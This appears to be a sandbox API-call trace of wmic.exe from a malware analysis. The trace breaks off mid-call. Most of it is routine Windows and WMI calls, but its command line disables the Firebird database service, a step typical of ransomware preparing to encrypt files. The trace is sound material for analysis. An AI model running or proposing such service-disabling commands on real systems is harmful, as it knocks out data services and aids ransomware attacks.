[0113.617] GetComputerNameW (in: lpBuffer=0xad3b10, nSize=0x50f660 | out: lpBuffer="LHNIWSJ", nSize=0x50f660) returned 1 [0113.617] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.617] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.617] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0113.617] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x50f674 | out: lpNameBuffer=0x0, nSize=0x50f674) returned 0x0 [0113.618] GetLastError () returned 0xea [0113.618] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xad3b50, nSize=0x50f674 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x50f674) returned 0x1 [0113.619] lstrlenW (lpString="") returned 0 [0113.619] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0113.620] lstrlenW (lpString=".") returned 1 [0113.620] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.620] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0113.620] lstrlenW (lpString="LOCALHOST") returned 9 [0113.620] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.620] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0113.620] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.620] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.620] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0113.620] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.621] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.621] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.621] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.621] ResolveDelayLoadedAPI () returned 0x77bb9840 [0113.624] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.624] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.624] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.625] SysStringLen (param_1="IMPERSONATE") returned 0xb [0113.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.625] SysStringLen (param_1="IMPERSONATE") returned 0xb [0113.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.625] SysStringLen (param_1="IMPERSONATE") returned 0xb [0113.625] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.625] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.625] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.625] SysStringLen (param_1="NONE") returned 0x4 [0113.625] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.625] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.625] SysStringLen (param_1="NONE") returned 0x4 [0113.625] SysStringLen (param_1="CONNECT") returned 0x7 [0113.625] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.626] SysStringLen (param_1="CALL") returned 0x4 [0113.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.626] SysStringLen (param_1="CALL") returned 0x4 [0113.626] SysStringLen (param_1="CONNECT") returned 0x7 [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="NONE") returned 0x4 [0113.626] SysStringLen (param_1="NONE") returned 0x4 [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.626] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.626] SysStringLen (param_1="NONE") returned 0x4 [0113.626] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.626] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.626] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.626] SysStringLen (param_1="PKT") returned 0x3 [0113.626] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.626] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.627] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.627] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.627] GetSystemDirectoryW (in: lpBuffer=0xad29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.627] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0113.627] SysStringLen (param_1="\\wbem\\") returned 0x6 [0113.628] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0113.628] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0113.628] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0113.628] GetCurrentThreadId () returned 0xed8 [0113.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x50f184 | out: phkResult=0x50f184*=0x164) returned 0x0 [0113.628] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x50f190, lpcbData=0x50f18c*=0x400 | out: lpType=0x0, lpData=0x50f190*=0x30, lpcbData=0x50f18c*=0x4) returned 0x0 [0113.628] _wcsicmp (_String1="0", _String2="1") returned -1 [0113.628] _wcsicmp (_String1="0", _String2="2") returned -2 [0113.628] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x50f18c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x50f18c*=0x42) returned 0x0 [0113.628] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xad2be0, lpcbData=0x50f18c*=0x42 | out: lpType=0x0, lpData=0xad2be0*=0x25, lpcbData=0x50f18c*=0x42) returned 0x0 [0113.628] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0113.628] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0113.628] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x50f190, lpcbData=0x50f18c*=0x400 | out: lpType=0x0, lpData=0x50f190*=0x36, lpcbData=0x50f18c*=0xc) returned 0x0 [0113.628] _wtol (_String="65536") returned 65536 [0113.628] RegCloseKey (hKey=0x0) returned 0x6 [0113.628] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x50f624 | out: ppv=0x50f624*=0x7f45a8) returned 0x0 [0113.640] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x7f45a8, xmlSource=0x50f5a4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x50f608 | out: isSuccessful=0x50f608*=0xffff) returned 0x0 [0113.687] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x7f45a8, DOMElement=0x50f61c | out: DOMElement=0x50f61c) returned 0x0 [0113.688] SysStringLen (param_1="VALUE") returned 0x5 [0113.688] SysStringLen (param_1="TABLE") returned 0x5 [0113.688] SysStringLen (param_1="TABLE") returned 0x5 [0113.688] SysStringLen (param_1="VALUE") returned 0x5 [0113.689] SysStringLen (param_1="LIST") returned 0x4 [0113.689] SysStringLen (param_1="TABLE") returned 0x5 [0113.689] SysStringLen (param_1="RAWXML") returned 0x6 [0113.689] SysStringLen (param_1="TABLE") returned 0x5 [0113.689] SysStringLen (param_1="RAWXML") returned 0x6 [0113.689] SysStringLen (param_1="LIST") returned 0x4 [0113.689] SysStringLen (param_1="LIST") returned 0x4 [0113.689] SysStringLen (param_1="RAWXML") returned 0x6 [0113.690] SysStringLen (param_1="HTABLE") returned 0x6 [0113.690] SysStringLen (param_1="TABLE") returned 0x5 [0113.690] SysStringLen (param_1="HTABLE") returned 0x6 [0113.690] SysStringLen (param_1="LIST") returned 0x4 [0113.690] SysStringLen (param_1="HFORM") returned 0x5 [0113.690] SysStringLen (param_1="TABLE") returned 0x5 [0113.690] SysStringLen (param_1="HFORM") returned 0x5 [0113.690] SysStringLen (param_1="LIST") returned 0x4 [0113.690] SysStringLen (param_1="HFORM") returned 0x5 [0113.690] SysStringLen (param_1="HTABLE") returned 0x6 [0113.691] SysStringLen (param_1="XML") returned 0x3 [0113.691] SysStringLen (param_1="TABLE") returned 0x5 [0113.691] SysStringLen (param_1="XML") returned 0x3 [0113.691] SysStringLen (param_1="VALUE") returned 0x5 [0113.691] SysStringLen (param_1="VALUE") returned 0x5 [0113.691] SysStringLen (param_1="XML") returned 0x3 [0113.691] SysStringLen (param_1="MOF") returned 0x3 [0113.691] SysStringLen (param_1="TABLE") returned 0x5 [0113.691] SysStringLen (param_1="MOF") returned 0x3 [0113.691] SysStringLen (param_1="LIST") returned 0x4 [0113.691] SysStringLen (param_1="MOF") returned 0x3 [0113.691] SysStringLen (param_1="RAWXML") returned 0x6 [0113.691] SysStringLen (param_1="LIST") returned 0x4 [0113.691] SysStringLen (param_1="MOF") returned 0x3 [0113.692] SysStringLen (param_1="CSV") returned 0x3 [0113.692] SysStringLen (param_1="TABLE") returned 0x5 [0113.692] SysStringLen (param_1="CSV") returned 0x3 [0113.692] SysStringLen (param_1="LIST") returned 0x4 [0113.692] SysStringLen (param_1="CSV") returned 0x3 [0113.692] SysStringLen (param_1="HTABLE") returned 0x6 [0113.692] SysStringLen (param_1="CSV") returned 0x3 [0113.692] SysStringLen (param_1="HFORM") returned 0x5 [0113.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.692] SysStringLen (param_1="TABLE") returned 0x5 [0113.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.692] SysStringLen (param_1="VALUE") returned 0x5 [0113.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.692] SysStringLen (param_1="XML") returned 0x3 [0113.692] SysStringLen (param_1="XML") returned 0x3 [0113.692] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.693] SysStringLen (param_1="texttablewsys") returned 0xd [0113.693] SysStringLen (param_1="TABLE") returned 0x5 [0113.693] SysStringLen (param_1="texttablewsys") returned 0xd [0113.693] SysStringLen (param_1="XML") returned 0x3 [0113.693] SysStringLen (param_1="texttablewsys") returned 0xd [0113.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.693] SysStringLen (param_1="XML") returned 0x3 [0113.693] SysStringLen (param_1="texttablewsys") returned 0xd [0113.693] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.693] SysStringLen (param_1="TABLE") returned 0x5 [0113.693] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.693] SysStringLen (param_1="XML") returned 0x3 [0113.693] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.693] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.694] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.694] SysStringLen (param_1="TABLE") returned 0x5 [0113.694] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.694] SysStringLen (param_1="XML") returned 0x3 [0113.694] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.694] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.694] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.694] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.694] SysStringLen (param_1="TABLE") returned 0x5 [0113.694] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.694] SysStringLen (param_1="XML") returned 0x3 [0113.694] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.694] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.694] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="TABLE") returned 0x5 [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="XML") returned 0x3 [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.695] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.695] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.695] SysStringLen (param_1="TABLE") returned 0x5 [0113.695] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.695] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.695] SysStringLen (param_1="XML") returned 0x3 [0113.695] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.695] SysStringLen (param_1="texttablewsys") returned 0xd [0113.695] SysStringLen (param_1="XML") returned 0x3 [0113.695] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="TABLE") returned 0x5 [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="XML") returned 0x3 [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="texttablewsys") returned 0xd [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.696] SysStringLen (param_1="XML") returned 0x3 [0113.696] SysStringLen (param_1="htable-sortby") returned 0xd [0113.696] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.696] SysStringLen (param_1="TABLE") returned 0x5 [0113.696] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.696] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.696] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.696] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="TABLE") returned 0x5 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.697] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.697] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="TABLE") returned 0x5 [0113.697] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.697] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.698] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] SysStringLen (param_1="TABLE") returned 0x5 [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.698] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.698] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.698] FreeThreadedDOMDocument:IUnknown:Release (This=0x7f45a8) returned 0x0 [0113.698] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'" [0113.698] memcpy_s (in: _Destination=0xad8060, _DestinationSize=0xae, _Source=0x831588, _SourceSize=0xa0 | out: _Destination=0xad8060) returned 0x0 [0113.699] GetLocalTime (in: lpSystemTime=0x50f5cc | out: lpSystemTime=0x50f5cc*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x6, wMilliseconds=0x22e)) [0113.699] _vsnwprintf (in: _Buffer=0xad8118, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x50f5ac | out: _Buffer="04-15-2018T10:09:06") returned 19 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString="SERVICE") returned 7 [0113.699] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString="WHERE") returned 5 [0113.699] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0113.699] memmove_s (in: _Destination=0xad2c78, _DestinationSize=0x4, _Source=0xad2c68, _SourceSize=0x4 | out: _Destination=0xad2c78) returned 0x0 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0113.699] _wcsicmp (_String1="'caption LIKE '%Firebird%''", _String2="\"NULL\"") returned 5 [0113.699] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0113.699] lstrlenW (lpString="'caption LIKE '%Firebird%''") returned 27 [0113.699] memmove_s (in: _Destination=0xad7d90, _DestinationSize=0x8, _Source=0xad2c78, _SourceSize=0x8 | out: _Destination=0xad7d90) returned 0x0 [0113.699] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.699] lstrlenW (lpString="CALL") returned 4 [0113.699] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0113.699] memmove_s (in: _Destination=0xad8000, _DestinationSize=0xc, _Source=0xad7d90, _SourceSize=0xc | out: _Destination=0xad8000) returned 0x0 [0113.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.700] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.700] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0113.700] memmove_s (in: _Destination=0xad2478, _DestinationSize=0x10, _Source=0xad8000, _SourceSize=0x10 | out: _Destination=0xad2478) returned 0x0 [0113.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'") returned 76 [0113.700] lstrlenW (lpString="'Disabled'") returned 10 [0113.700] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0113.700] lstrlenW (lpString="'Disabled'") returned 10 [0113.700] lstrlenW (lpString="'Disabled'") returned 10 [0113.700] lstrlenW (lpString="QUIT") returned 4 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0113.700] lstrlenW (lpString="EXIT") returned 4 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0113.700] WbemLocator:IUnknown:AddRef (This=0x836ed8) returned 0x2 [0113.700] lstrlenW (lpString="/") returned 1 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0113.700] lstrlenW (lpString="-") returned 1 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0113.700] lstrlenW (lpString="CLASS") returned 5 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0113.700] lstrlenW (lpString="PATH") returned 4 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0113.700] lstrlenW (lpString="CONTEXT") returned 7 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] lstrlenW (lpString="SERVICE") returned 7 [0113.700] GetCurrentThreadId () returned 0xed8 [0113.700] ??0CHString@@QAE@XZ () returned 0x50f520 [0113.700] WbemLocator:IWbemLocator:ConnectServer (in: This=0x836ed8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x860690) returned 0x0 [0113.722] CoSetProxyBlanket (pProxy=0x860690, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.723] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.723] GetCurrentThreadId () returned 0xed8 [0113.723] ??0CHString@@QAE@XZ () returned 0x50f4c8 [0113.723] SysStringLen (param_1="root\\cli") returned 0x8 [0113.723] SysStringLen (param_1="\\") returned 0x1 [0113.723] SysStringLen (param_1="root\\cli\\") returned 0x9 [0113.723] SysStringLen (param_1="ms_409") returned 0x6 [0113.723] WbemLocator:IWbemLocator:ConnectServer (in: This=0x836ed8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x8605f0) returned 0x0 [0113.730] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.730] GetCurrentThreadId () returned 0xed8 [0113.730] ??0CHString@@QAE@XZ () returned 0x50f524 [0113.730] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0113.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xad8aa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0113.730] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0113.730] SysStringLen (param_1="SERVICE") returned 0x7 [0113.731] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0113.731] SysStringLen (param_1="'") returned 0x1 [0113.731] IWbemServices:GetObject (in: This=0x860690, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x50f520*=0x0, ppCallResult=0x0 | out: ppObject=0x50f520*=0x8850e8, ppCallResult=0x0) returned 0x0 [0113.737] IWbemClassObject:Get (in: This=0x8850e8, wszName="Target", lFlags=0, pVal=0x50f4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.737] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.737] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.738] IWbemClassObject:Get (in: This=0x8850e8, wszName="PWhere", lFlags=0, pVal=0x50f4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] lstrlenW (lpString="WHERE Name='#'") returned 14 [0113.738] lstrlenW (lpString="WHERE Name='#'") returned 14 [0113.738] IWbemClassObject:Get (in: This=0x8850e8, wszName="Connection", lFlags=0, pVal=0x50f4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f4f8*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8854a8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] IUnknown:QueryInterface (in: This=0x8854a8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x50f514 | out: 